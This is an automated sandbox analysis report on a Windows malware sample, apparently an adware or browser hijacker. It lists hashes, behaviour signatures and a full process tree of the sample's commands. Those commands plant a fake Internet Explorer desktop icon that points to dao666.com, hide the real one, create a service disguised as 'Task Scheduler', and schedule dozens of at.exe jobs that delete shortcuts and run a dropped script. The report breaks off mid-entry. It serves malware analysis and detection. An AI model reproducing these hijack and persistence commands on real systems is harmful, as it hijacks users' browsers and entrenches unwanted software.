Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/11/2024, 08:38

General

  • Target

    8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe

  • Size

    444KB

  • MD5

    8a903fdc2c88d4b47405519f174877cd

  • SHA1

    e9d2e4265d7c9623cb5b5c309cac128eaac78297

  • SHA256

    585096007cf202b245bd6b1e891142e4d2603addbd09e23b2fec98487ccd7fcd

  • SHA512

    75f558c37595039c36920c1b35a5581bfea3a55553680d1a8b79449405b33edf06a4a522465de6baa982c24045712c1744cfbc057ea86ba811452cc647190ea3

  • SSDEEP

    12288:wutrzh9xOXk7GMHOJxl/0z+uoqzBTQGtem:wutr5OUStD/0zpJ7

Malware Config

Signatures

  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 6 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 14 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Service Discovery 1 TTPs 3 IoCs

    Adversaries may try to gather information about registered local system services.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 44 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2804 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\tool.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2700
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2936
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2708
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2628
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
          4⤵
          • Modifies registry class
          PID:2584
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2592
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
          4⤵
          • Modifies registry class
          PID:2636
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
          4⤵
          • Modifies registry class
          PID:2692
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2164
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
          4⤵
          • Modifies registry class
          PID:3056
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3060
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
          4⤵
          • Modifies registry class
          PID:2808
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1488
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2356
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
          4⤵
          • Modifies registry class
          PID:1424
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
          4⤵
          • Modifies registry class
          PID:1332
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1296
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:2464
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry class
          PID:1500
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:1736
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:1992
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1988
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2380
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012
        • C:\Windows\SysWOW64\sc.exe
          sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
          4⤵
          • Launches sc.exe
          • System Service Discovery
          PID:1644
        • C:\Windows\SysWOW64\sc.exe
          sc config Schedule start= auto
          4⤵
          • Launches sc.exe
          PID:1912
        • C:\Windows\SysWOW64\net.exe
          net start "Task Scheduler"
          4⤵
          • System Location Discovery: System Language Discovery
          • System Service Discovery
          PID:1204
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 start "Task Scheduler"
            5⤵
            • System Service Discovery
            PID:236
        • C:\Windows\SysWOW64\at.exe
          at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:336
        • C:\Windows\SysWOW64\at.exe
          at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2488
        • C:\Windows\SysWOW64\at.exe
          at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          4⤵
            PID:1516
          • C:\Windows\SysWOW64\at.exe
            at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
            4⤵
              PID:1792
            • C:\Windows\SysWOW64\at.exe
              at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
              4⤵
                PID:2672
              • C:\Windows\SysWOW64\at.exe
                at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2632
              • C:\Windows\SysWOW64\at.exe
                at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                4⤵
                  PID:2912
                • C:\Windows\SysWOW64\at.exe
                  at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3068
                • C:\Windows\SysWOW64\at.exe
                  at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2444
                • C:\Windows\SysWOW64\at.exe
                  at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1600
                • C:\Windows\SysWOW64\at.exe
                  at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                  4⤵
                    PID:1848
                  • C:\Windows\SysWOW64\at.exe
                    at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1852
                  • C:\Windows\SysWOW64\at.exe
                    at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1152
                  • C:\Windows\SysWOW64\at.exe
                    at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                    4⤵
                      PID:1136
                    • C:\Windows\SysWOW64\at.exe
                      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                      4⤵
                        PID:1356
                      • C:\Windows\SysWOW64\at.exe
                        at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1684
                      • C:\Windows\SysWOW64\at.exe
                        at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:764
                      • C:\Windows\SysWOW64\at.exe
                        at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                        4⤵
                          PID:1728
                        • C:\Windows\SysWOW64\at.exe
                          at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                          4⤵
                            PID:1716
                          • C:\Windows\SysWOW64\at.exe
                            at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                            4⤵
                              PID:900
                            • C:\Windows\SysWOW64\at.exe
                              at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1532
                            • C:\Windows\SysWOW64\at.exe
                              at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2552
                            • C:\Windows\SysWOW64\at.exe
                              at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1964
                            • C:\Windows\SysWOW64\at.exe
                              at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2352
                            • C:\Windows\SysWOW64\at.exe
                              at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:756
                            • C:\Windows\SysWOW64\at.exe
                              at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:544
                            • C:\Windows\SysWOW64\at.exe
                              at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                              4⤵
                                PID:1744
                              • C:\Windows\SysWOW64\at.exe
                                at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3008
                              • C:\Windows\SysWOW64\at.exe
                                at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                4⤵
                                  PID:2268
                                • C:\Windows\SysWOW64\at.exe
                                  at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                  4⤵
                                    PID:1564
                                  • C:\Windows\SysWOW64\at.exe
                                    at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                    4⤵
                                      PID:2272
                                    • C:\Windows\SysWOW64\at.exe
                                      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2484
                                    • C:\Windows\SysWOW64\at.exe
                                      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1268
                                    • C:\Windows\SysWOW64\at.exe
                                      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2056
                                    • C:\Windows\SysWOW64\at.exe
                                      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2280
                                    • C:\Windows\SysWOW64\at.exe
                                      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                      4⤵
                                        PID:2060
                                      • C:\Windows\SysWOW64\at.exe
                                        at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                        4⤵
                                          PID:2476
                                        • C:\Windows\SysWOW64\at.exe
                                          at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2184
                                        • C:\Windows\SysWOW64\at.exe
                                          at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2084
                                        • C:\Windows\SysWOW64\at.exe
                                          at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2720
                                        • C:\Windows\SysWOW64\at.exe
                                          at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                          4⤵
                                            PID:2812
                                          • C:\Windows\SysWOW64\at.exe
                                            at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2864
                                          • C:\Windows\SysWOW64\at.exe
                                            at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                            4⤵
                                              PID:2848
                                            • C:\Windows\SysWOW64\at.exe
                                              at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                              4⤵
                                                PID:2600
                                              • C:\Windows\SysWOW64\at.exe
                                                at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2572
                                              • C:\Windows\SysWOW64\at.exe
                                                at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                4⤵
                                                  PID:2592
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3052
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:576
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:668
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
                                                  4⤵
                                                    PID:2044
                                                  • C:\Windows\SysWOW64\at.exe
                                                    at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                    4⤵
                                                      PID:1500
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2016
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2316
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                      4⤵
                                                        PID:2956
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                        4⤵
                                                          PID:2324
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                          4⤵
                                                            PID:1912
                                                          • C:\Windows\SysWOW64\at.exe
                                                            at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
                                                            4⤵
                                                              PID:1204
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1144
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1800
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2640
                                                            • C:\Windows\SysWOW64\at.exe
